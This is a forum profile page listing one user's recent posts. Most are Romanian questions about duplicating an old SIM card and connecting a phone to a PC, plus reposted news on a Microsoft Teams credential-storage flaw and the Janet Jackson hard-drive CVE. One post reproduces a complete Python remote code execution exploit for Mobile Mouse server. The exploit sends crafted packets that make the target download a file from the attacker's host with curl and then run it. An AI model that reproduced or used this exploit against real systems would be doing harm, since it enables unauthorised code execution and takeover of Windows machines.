Jump to content


Active Members
  • Posts

  • Joined

  • Days Won


Kev last won the day on September 18

Kev had the most liked content!


380 Excellent


About Kev

  • Rank
    Rising Star
    Rising Star

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Dude, nu-mi place sa folosesc cuvantul "clonez", doar vreau sa am doua cartele cu acelasi numar, sa nu functioneze simultan, unul pentru acasa iar al II-lea pentru serviciu
  2. Nu dude, poate sunt mecanic auto, sau lucrez pe sentier, sa nu sparg Android-ul, si, nu pot face redirect pe acelasi numar, cartelele sunt vechi, expirate, nu pot fi reactivate si, face redirectionare pe acelasi numar, scoate cartela, intro in jaf, si invers, am crezut ca poate axista vreo aplicatie pentru Android cu care sa nu functioneze ambele cartele simultan
  3. https://www.imyfone.com/mobile-transfer/how-to-clone-a-sim-card/
  4. Right Edit: nici Quote nu functioneaza pe Opera version is90.0.4480.84
  5. am abonament, sim-ul este mort, e prepay expirat,k nu pot suna nici la 222, *133# nimic, asta vreau sa-l readuc la viata si sa functrioneze simultan
  6. Salut, vreau sa conectez un PC cu 4 porturi USB la un telefon, (remote control), am iOs si monitor asus de 17", vrem sa vizionam un film prin cablu USb, exista o aplicatie? Fara hardware, cablu USB, Yelefon iOS, monitor PC 17" Edit:/ Android Multumesc
  7. Salut, vreau sa plec la vanatoare/pescuit/picnic, nu stiu ce peripetii mai fac pe acolo... Vreau sa "salvez" nr. de telefon (SIM-ul), de pe un iOS (dual SIM) pe SIM vechi (anulat), pentru un a salva nr personal. telefon e.g. Nokia 3310, 5100 etc... Ideea este ca nu vreau sa functioneze simultan, vreau doar cand plec la drumetii sa am un nr. de contact, in caz de urgente, moare porcul, pisica, cainele, iar cel de acasa (personal) sa fie offline. Exista App care sa faca treaba asta? (in caz de ceva ajung acasa si ii dau on pe numarul personal, acelasi numar pe care l-a luat valul. Cu alte cuvinte, ma duc la vanatoare/pescuit/picnic ma impinge un prost in apa si cad cu tot cu tel, sa nu stric iOS-ul, sa am o rabla cu mine cu acelasi nr pe care il am in casa, nu sunt waterproof nici generatiile vechi nici cele noi, primele care sunt afectate sunt SIM-urile (patit). Sper ca ati inteles Thanks
  8. A Microsoft logo sits illuminated at the World Mobile Congress at the Fira Gran Via Complex on Feb. 22, 2016, in Barcelona, Spain. (Photo by David Ramos/Getty Images) Researchers on Tuesday reported that this past August they identified an attack path that lets malicious actors with file system access to steal credentials for any Microsoft Teams user who’s logged-on. In a Sept. 13 blog post, the Vectra Protect team said because attackers do not require elevated permissions to read these files, it exposes this potential concern to any attack that provides malicious actors with local or remote system access. The researchers said this vulnerability impacted all commercial and Government Community Cloud Desktop Team clients for Windows, Mac and Linux. Microsoft has been made aware of this issue and closed the case in late August, stating that it did not meet its bar for immediate servicing. The Vectra researchers said until Microsoft moves to update the Teams Desktop Application, they don’t recommend using the full Teams client and advise customers to consider using the web-based Teams application exclusively. The researchers said security teams should use the web-based Teams client inside Microsoft Edge, which has multiple OS-level controls to protect token leaks. They said the Teams web application is robust and supports most features enabled through the desktop client, keeping the organization’s productivity impacts to a minimum. For customers that must use the installed desktop application, the researchers said it’s critical to watch key application files for access by any processes other than the official Teams application. When asked Thursday if the situation had changed, Aaron Turner, CTO, SaaS Protect at Vectra, said to the Vectra team’s knowledge, Microsoft had not changed its stance. Turner said in Vectra’s interactions with customers, only those organizations with extreme exposure to sophisticated adversaries (defense contractors, critical infrastructure operators) are seriously considering eliminating the Teams.exe application on endpoints and forcing users to collaborate through Teams via a managed browser. Turner said most of the organizations he has talked to plan on implementing an endpoint detection and response monitoring policy to watch for any situations of unauthorized access by a system process to the file storage locations where the tokens are stored. Turner added that the work Vectra’s Connor Peoples spearheaded to discover this vulnerability and coordinate his findings with Microsoft is part of Vectra's efforts to help make the Microsoft 365 ecosystem a safer and fairer place for any organization to communicate and collaborate. As outlined in the research, Turner said there are some improvements that Microsoft can make to shore up the Electron application for Windows and MacOS. He said those improvements should also help prevent future vulnerabilities, such as other recently disclosed problems relating to XSS attacks and potential command and control activity using GIFs. Sammy Migues, principal scientist at Synopsys Software Integrity Group, said like every application framework, Electron has its own idiosyncrasies related to authentication, secure file storage, and communications. Migues said development teams use frameworks for the same reason they use lots of other open source — it makes their jobs easier and faster. On the other hand, even security-aware teams might not understand what’s really going on in the depths of the framework they’re using. Migues said In this case, it appears that Electron might save some sensitive data in an insecure way. Via scmagazine.com/
  9. # Exploit Title: Mobile Mouse Remote Code Execution # Exploit Author: Chokri Hammedi # Vendor Homepage: https://mobilemouse.com/ # Software Link: https://www.mobilemouse.com/downloads/setup.exe # Version: # Tested on: Windows 10 Enterprise LTSC Build 17763 #!/usr/bin/env python3 import socket from time import sleep import argparse help = " Mobile Mouse Remote Code Execution " parser = argparse.ArgumentParser(description=help) parser.add_argument("--target", help="Target IP", required=True) parser.add_argument("--file", help="File name to Upload") parser.add_argument("--lhost", help="Your local IP", default="") args = parser.parse_args() host = args.target command_shell = args.file lhost = args.lhost port = 9099 # Default Port s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B7269 68616D6D6564691E6950686F6E651E321E321E04") s.send(CONN) run = s.recv(54) RUN = bytearray.fromhex("4b45591e3131341e721e4f505404") s.send(RUN) run = s.recv(54) sleep(0.5) download_string= f"curl http://{lhost}:8080/{command_shell} -o c:\Windows\Temp\{command_shell}".encode('utf-8') hex_shell = download_string.hex() SHELL = bytearray.fromhex("4B45591E3130301E" + hex_shell + "1E04" + "4b45591e2d311e454e5445521e04") s.send(SHELL) shell = s.recv(96) print ("Executing The Command Shell...") sleep(5) RUN2 = bytearray.fromhex("4b45591e3131341e721e4f505404") s.send(RUN2) run2 = s.recv(54) sleep(0.8) shell_string= f"c:\Windows\Temp\{command_shell}".encode('utf-8') hex_run = shell_string.hex() RUN3 = bytearray.fromhex("4B45591E3130301E" + hex_run + "1E04" + "4b45591e2d311e454e5445521e04") s.send(RUN3) run3 = s.recv(96) print (" Take The Rose") sleep(50) s.close() # 0day.today [2022-09-11] # Source: 0day.today
  10. Parental Control, il pune pe mod avion, ii cumperi un fard in fapt
  11. Umple frigideru, On: din cate stiu se poate da purge spammer % delete
  12. Bun concept, asta in cazul in care nu ai intentii de Supermarket, de nu-mi primesc facturile de gaze. ON: poti face conversie din html, http, csf, ncsf in ce vrei tu cu grep, le importi (cu plata) in smsglobal, (daca ai subscribe) sa fie legit sau, ... revin cu un edit
  13. Another reason not to play 1989's Rhythm Nation – it messes with some hard disk drives The music video for Janet Jackson's 1989 pop hit Rhythm Nation has been recognized as an exploit for a cybersecurity vulnerability after Microsoft reported it can crash old laptop computers. The story detailed how "a major computer manufacturer discovered that playing the music video for Janet Jackson's Rhythm Nation would crash certain models of laptops." Further investigation revealed that multiple manufacturers' machines also crashed. Sometimes playing the video on one laptop would crash another nearby laptop. This is mysterious because the song isn't actually that bad. Investigation revealed that all the crashing laptops shared the same 5400 RPM hard disk drive. The manufacturer that found the problem apparently added a custom filter in the audio pipeline to detect and remove the offending frequencies during audio playback. Few modern machines have hard disk drives, never mind drives that rotate at the unfashionably slow speed of 5400 revolutions per minute. Also, hardly anybody listens to Janet Jackson anymore. The Register nonetheless reports this news because The Mitre Corporation has seen fit to list it on the register of Common Vulnerabilities and Exposures (CVEs) – the definitive list of cybersecurity vulnerabilities we all need to watch out for. It's listed as CVE-2022-38392 and has already been acknowledged by security vendor Tenable. OK, so you've air-gapped that PC. Cut the speakers. Covered the LEDs. Disconnected the monitor. Now, about the data-leaking power supply unit … APIC fail: Intel 'Sunny Cove' chips with SGX spill secrets Real-time deepfakes can be beaten by a sideways glance While the bug seems comical, side-channel attacks are a real threat. Israeli researcher Mordechai Guri has found ways to attack computers including by making memory emit radiation in the same bands used by Wi-Fi and encoding information into those emissions. Owners of laptops with old, slow, hard disks therefore need to be very careful if they hear Janet Jackson tunes while they work – which is why we've not embedded Rhythm Nation in this story. But it does feel safe to remind readers of the weirdest bug The Register has previously encountered: Cisco's alert about cosmic rays crashing some kit. ® Via theregister.com
  • Create New...